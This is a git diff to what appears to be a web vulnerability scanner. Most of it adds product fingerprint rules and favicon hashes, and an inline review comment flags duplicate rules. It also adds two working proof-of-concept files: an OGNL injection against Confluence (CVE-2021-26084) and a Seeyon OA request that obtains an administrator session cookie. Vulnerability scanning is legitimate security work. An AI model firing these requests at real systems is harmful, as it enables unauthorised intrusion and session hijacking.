+ {"和信创天云桌面系统", "code", "(和信下一代云桌面VENGD|/vesystem/index.php)"},
+ {"金山", "code", "(北京猎鹰安全科技有限公司|金山终端安全系统V9.0Web控制台|北京金山安全管理系统技术有限公司|金山V8)"},
+ {"WIFISKY-7层流控路由器", "code", "(深圳市领空技术有限公司|WIFISKY 7层流控路由器)"},
+ {"MetInfo-米拓建站", "code", "(MetInfo|/skin/style/metinfo.css|/skin/style/metinfo-v2.css)"},
+ {"IBM-Lotus-Domino", "code", "(/mailjump.nsf|/domcfg.nsf|/names.nsf|/homepage.nsf)"},
+ {"APACHE-kylin", "code", "(url=kylin)"},
+ {"C-Lodop打印服务系统", "code", "(/CLodopfuncs.js|www.c-lodop.com)"},
+ {"ATLASSIAN-Confluence", "code", "(Atlassian Confluence)"},
+ {"HFS", "code", "(href=\"http://www.rejetto.com/hfs/)"},
+ {"Jellyfin", "code", "(content=\"http://jellyfin.org\")"},
+ {"FIT2CLOUD-JumpServer-堡垒机", "code", "(JumpServer)"},
+ {"Alibaba Nacos", "code", "(Nacos)"},
+ {"Nagios", "headers", "(nagios admin)"},
+ {"Pulse Connect Secure", "code", "(/dana-na/imgs/space.gif)"},
+ {"h5ai", "code", "(powered by h5ai)"},
+ {"jeesite", "cookie", "(jeesite.session.id)"},
+ {"拓尔思SSO", "cookie", "(trsidsssosessionid)"},
+ {"拓尔思WCMv7/6", "cookie", "(com.trs.idm.coSessionId)"},
+ {"天融信脆弱性扫描与管理系统", "code", "(/js/report/horizontalReportPanel.js)"},
+ {"天融信网络审计系统", "code", "(onclick=dlg_download())"},
+ {"天融信日志收集与分析系统", "code", "(天融信日志收集与分析系统)"},
+ {"URP教务系统", "code", "(北京清元优软科技有限公司)"},
+ {"科来RAS", "code", "(科来软件 版权所有|i18ninit.min.js)"},
+ {"正方OA", "code", "(zfoausername)"},
+ {"希尔OA", "code", "(/heeroa/login.do)"},
+ {"泛普建筑工程施工OA", "code", "(/dwr/interface/LoginService.js)"},
+ {"中望OA", "code", "(/IMAGES/default/first/xtoa_logo.png|/app_qjuserinfo/qjuserinfoadd.jsp)"},
+ {"海天OA", "code", "(HTVOS.js)"},
+ {"信达OA", "code", "(http://www.xdoa.cn)"},
+ {"任我行CRM", "code", "(CRM_LASTLOGINUSERKEY)"},
+ {"Spammark邮件信息安全网关", "code", "(/cgi-bin/spammark?empty=1)"},
+ {"winwebmail", "code", "(WinWebMail Server|images/owin.css)"},
+ {"浪潮政务系统", "code", "(LangChao.ECGAP.OutPortal|OnlineQuery/QueryList.aspx)"},
+ {"天融信防火墙", "code", "(/cgi/maincgi.cgi)"},
+ {"网神防火墙", "code", "(css/lsec/login.css)"},
+ {"帕拉迪统一安全管理和综合审计系统", "code", "(module/image/pldsec.css)"},
+ {"蓝盾BDWebGuard", "code", "(BACKGROUND: url(images/loginbg.jpg) #e5f1fc)"},
+ {"Huawei SMC", "code", "(Script/SmcScript.js?version=)"},
+ {"coremail","code","(/coremail/bundle/|contextRoot: \"/coremail\")"},
+ {"activemq","code","(activemq_logo|Manage ActiveMQ broker)"},
+ {"锐捷网络","code","(static/img/title.ico|support.ruijie.com.cn|Ruijie - NBR|eg.login.loginBtn)"},
+ {"禅道", "code", "(/theme/default/images/main/zt-logo.png|zentaosid)"},
+ {"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|Hypertext Transfer Protocol -- HTTP/1.1|Error 404--Not Found|Welcome to Weblogic Application Server|Oracle WebLogic Server 管理控制台)"},
+ {"weblogic", "headers", "(WebLogic)"},
+ {"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif|/seeyon/common/)"},
+ {"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"},
+ {"深信服ssl-vpn", "code", "(login_psw.csp|loginPageSP/loginPrivacy.js|/por/login_psw.csp)"},
+ {"Struts2", "code", "(org.apache.struts2|Struts Problem Report|struts.devMode|struts-tags|There is no Action mapped for namespace)"},
+ {"泛微OA", "code", "(/spa/portal/public/index.js|wui/theme/ecology8/page/images/login/username_wev8.png|/wui/index.html#/?logintype=1)"},
+ {"Swagger UI", "code", "(/swagger-ui.css|swagger-ui-bundle.js|swagger-ui-standalone-preset.js)"},
+ {"金蝶政务GSiS", "code", "(/kdgs/script/kdgs.js|HTML5/content/themes/kdcss.min.css|/ClientBin/Kingdee.BOS.XPF.App.xap)"},
+ {"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization|sys/ui/extend/theme/default/style/icon.css|sys/ui/extend/theme/default/style/profile.css)"},
+ {"用友NC", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg)"},
+ {"用友IUFO", "code", "(iufo/web/css/menu.css)"},
+ {"TELEPORT堡垒机", "code", "(/static/plugins/blur/background-blur.js)"},
+ {"JEECMS", "code", "(/r/cms/www/red/js/common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"},
+ {"CMS", "code", "(Powered by .*CMS)"},
+ {"editor", "code", "(editor)"},
+ {"ATLASSIAN-Confluence","code","(confluence.)"},
 }
 var Md5Datas = []Md5Data{
 {"BIG-IP", "04d9541338e525258daf47cc844d59f3"},
 {"蓝凌OA", "302464c3f6207d57240649926cfc7bd4"},
 {"JBOSS", "799f70b71314a7508326d1d2f68f7519"},
- {"锐捷网关", "d8d7c9138e93d43579ebf2e384745ba8"},
+ {"锐捷网络", "d8d7c9138e93d43579ebf2e384745ba8"},
+ {"锐捷网络", "9c21df9129aeec032df8ac15c84e050d"},
+ {"锐捷网络", "a45883b12d753bc87aff5bddbef16ab3"},
 {"深信服edr", "0b24d4d5c7d300d50ee1cd96059a9e85"},
 {"致远OA", "cdc85452665e7708caed3009ecb7d4e2"},
 {"致远OA", "17ac348fcce0b320e7bfab3fe2858dfa"},
@@ -159,18 +272,27 @@ var Md5Datas = []Md5Data{
 {"SpringBoot", "0488faca4c19046b94d07c3ee83cf9d6"},
 {"ThinkPHP", "f49c4a4bde1eec6c0b80c2277c76e3db"},
 {"通达OA", "ed0044587917c76d08573577c8b72883"},
- {"泛微OA", "41eca7a9245394106a09b2534d8030df"},
+ {"泛微E-mobile", "41eca7a9245394106a09b2534d8030df"},
 {"泛微OA", "c27547e27e1d2c7514545cd8d5988946"},
 {"泛微OA", "9b1d3f08ede38dbe699d6b2e72a8febb"},
 {"泛微OA", "281348dd57383c1f214ffb8aed3a1210"},
 {"GitLab", "85c754581e1d4b628be5b7712c042224"},
 {"Hikvision-视频监控", "89b932fcc47cf4ca3faadb0cfdef89cf"},
+ {"华夏erp", "c68b15c45cf80115a943772f7d0028a6"},
+ {"OpenSNS", "08711abfb016a55c0e84f7b54bef5632"},
+ {"MetInfo-米拓建站", "2a9541b5c2225ed2f28734c0d75e456f"},
+ {"IBM-Lotus-Domino", "36c1002bb579edf52a472b9d2e39bb50"},
+ {"IBM-Lotus-Domino", "639b61409215d770a99667b446c80ea1"},
+ {"ATLASSIAN-Confluence", "b91d19259cf480661ef93b67beb45234"},
+ {"activemq", "05664fb0c7afcd6436179437e31f3aa6"},
+ {"coremail", "ad74ff8f9a2f630fc2c5e6b3aa0a5cb8"},
 }
 var PocDatas = []PocData{
 {"致远OA", "seeyon"},
- {"泛微OA", "weaver-oa"},
+ {"泛微OA", "weaver"},
 {"通达OA", "tongda"},
+ {"蓝凌OA", "landray"},
 {"ThinkPHP", "thinkphp"},
 {"Nexus", "nexus"},
 {"齐治堡垒机", "qizhi"},
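Review bot: This hunk re-adds rules that earlier hunks of the same commit just merged or renamed, so `RuleDatas` now carries duplicates: `致远OA` (merged at the @@ -32 hunk), `蓝凌EIS智慧协同平台` (renamed to `蓝凌OA` at @@ -56), `用友NC`/`用友IUFO` (folded into `用友` at the top of this hunk), a second `weblogic` code rule that repeats the first one's patterns, a second `蓝凌OA`, two `ATLASSIAN-Confluence` entries, and `JQuery-1.7.2` next to the existing `Jquery-1.7.2`. Each duplicate costs an extra regexp match per response and yields repeated fingerprint lines, so keep one entry per product with the union of its patterns. Separately, `{"CMS", "code", "(Powered by .*CMS)"}` and `{"editor", "code", "(editor)"}` match far too broadly — `editor` fires on any page containing that word — so either tighten them to a specific product string or drop them.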
@@ -179,6 +301,8 @@ var PocDatas = []PocData{
 {"zabbix", "zabbix"},
 {"VMware vSphere", "vmware"},
 {"Jboss", "jboss"},
- {"用友NC", "yongyou"},
+ {"用友", "yongyou"},
 {"用友IUFO", "yongyou"},
+ {"coremail", "coremail"},
+ {"金山", "kingsoft"},
 }
diff --git a/WebScan/pocs/atlassian-confluence-rce.yml b/WebScan/pocs/atlassian-confluence-rce.yml
new file mode 100644
index 0000000..782fff2
--- /dev/null
+++ b/WebScan/pocs/atlassian-confluence-rce.yml
@@ -0,0 +1,17 @@
+name: poc-yaml-atlassian-confluence-rce
+set:
+ rand1: randomInt(1000, 9999)
+ rand2: randomInt(400, 9999)
+rules:
+ - method: POST
+ path: "/pages/createpage-entervariables.action"
+ follow_redirects: true
+ body: |
+ queryString=alt3kx\u0027%2b#{{{rand1}}*{{rand2}}}%2b\u0027
+ expression: |
+ response.status == 200 && response.body.bcontains(bytes(string(rand1 * rand2)))
+detail:
+ author: tangshoupu
+ info: Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)
+ links:
+ - https://mp.weixin.qq.com/s/lVCT6JAA_BU9h4ISLlMNbQ
\ No newline at end of file
diff --git a/WebScan/pocs/seeyon-oa-cookie-leak.yml b/WebScan/pocs/seeyon-oa-cookie-leak.yml
new file mode 100644
index 0000000..e746c4b
--- /dev/null
+++ b/WebScan/pocs/seeyon-oa-cookie-leak.yml
@@ -0,0 +1,16 @@
+name: poc-yaml-seeyon-oa-cookie-leak
+rules:
+ - method: POST
+ path: /seeyon/thirdpartyController.do
+ body: |
+ method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
+ expression: |
+ response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"/seeyon/common/")
+ - method: GET
+ path: /seeyon/main.do?method=headerjs
+ expression: |
+ response.status == 200 && response.body.bcontains(b"\"name\":\"系统管理员\"") && response.body.bcontains(b"\"id\":\"-7273032013234748168\"")
+detail:
+ author: Print1n(http://print1n.top)
+ links:
+ - https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg
\ No newline at end of file
diff --git a/WebScan/pocs/ecology-sqli.yml b/WebScan/pocs/weaver-ecology-sqli.yml
similarity index 100%
rename from WebScan/pocs/ecology-sqli.yml
rename to WebScan/pocs/weaver-ecology-sqli.yml
diff --git a/WebScan/pocs/ecology-validate-sqli.yml b/WebScan/pocs/weaver-ecology-validate-sqli.yml
similarity index 100%
rename from WebScan/pocs/ecology-validate-sqli.yml
rename to WebScan/pocs/weaver-ecology-validate-sqli.yml
diff --git a/WebScan/pocs/ecology-workflowservicexml-2.yml b/WebScan/pocs/weaver-ecology-workflowservicexml-2.yml
similarity index 100%
rename from WebScan/pocs/ecology-workflowservicexml-2.yml
rename to WebScan/pocs/weaver-ecology-workflowservicexml-2.yml
diff --git a/WebScan/pocs/ecology-workflowservicexml.yml b/WebScan/pocs/weaver-ecology-workflowservicexml.yml
similarity index 100%
rename from WebScan/pocs/ecology-workflowservicexml.yml
rename to WebScan/pocs/weaver-ecology-workflowservicexml.yml
diff --git a/WebScan/pocs/poc-yaml-weblogic-console-weak.yml b/WebScan/pocs/weblogic-console-weak.yml
similarity index 100%
rename from WebScan/pocs/poc-yaml-weblogic-console-weak.yml
rename to WebScan/pocs/weblogic-console-weak.yml